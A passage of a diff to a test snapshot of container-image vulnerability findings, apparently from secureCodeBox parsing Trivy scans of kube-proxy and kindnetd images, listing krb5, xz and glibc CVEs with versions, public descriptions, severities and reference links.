"https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", - ], - }, - "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.gentoo.org/glsa/202006-04", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-10029", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + ], + }, + "category": "Vulnerability", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", - }, - { - "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: stack guard protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "5.2.5-2.1~deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "5.2.5-2", - "packageName": "liblzma5", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { 